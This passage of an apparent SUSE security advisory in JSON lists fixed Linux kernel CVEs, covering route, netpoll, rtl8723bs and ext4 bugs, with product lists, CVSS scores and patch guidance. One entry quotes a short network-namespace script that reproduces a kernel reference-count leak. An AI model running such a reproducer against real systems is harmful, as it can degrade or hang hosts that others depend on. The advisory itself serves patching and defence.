"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n - No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing\n\nThe Extended Supported Rates (ESR) IE handling in OnBeacon accessed\n*(p + 1 + ielen) and *(p + 2 + ielen) without verifying that these\noffsets lie within the received frame buffer. A malformed beacon with\nan ESR IE positioned at the end of the buffer could cause an\nout-of-bounds read, potentially triggering a kernel panic.\n\nAdd a boundary check to ensure that the ESR IE body and the subsequent\nbytes are within the limits of the frame before attempting to access\nthem.\n\nThis prevents OOB reads caused by malformed beacon frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68254",
"url": "https://www.suse.com/security/cve/CVE-2025-68254"
},
{
"category": "external",
"summary": "SUSE Bug 1255140 for CVE-2025-68254",
"url": "https://bugzilla.suse.com/1255140"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68254"
},
{
"cve": "CVE-2025-68256",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68256"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser\n\nThe Information Element (IE) parser rtw_get_ie() trusted the length\nbyte of each IE without validating that the IE body (len bytes after\nthe 2-byte header) fits inside the remaining frame buffer. A malformed\nframe can advertise an IE length larger than the available data, causing\nthe parser to increment its pointer beyond the buffer end. This results\nin out-of-bounds reads or, depending on the pattern, an infinite loop.\n\nFix by validating that (offset + 2 + len) does not exceed the limit\nbefore accepting the IE or advancing to the next element.\n\nThis prevents OOB reads and ensures the parser terminates safely on\nmalformed frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68256",
"url": "https://www.suse.com/security/cve/CVE-2025-68256"
},
{
"category": "external",
"summary": "SUSE Bug 1255138 for CVE-2025-68256",
"url": "https://bugzilla.suse.com/1255138"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68256"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
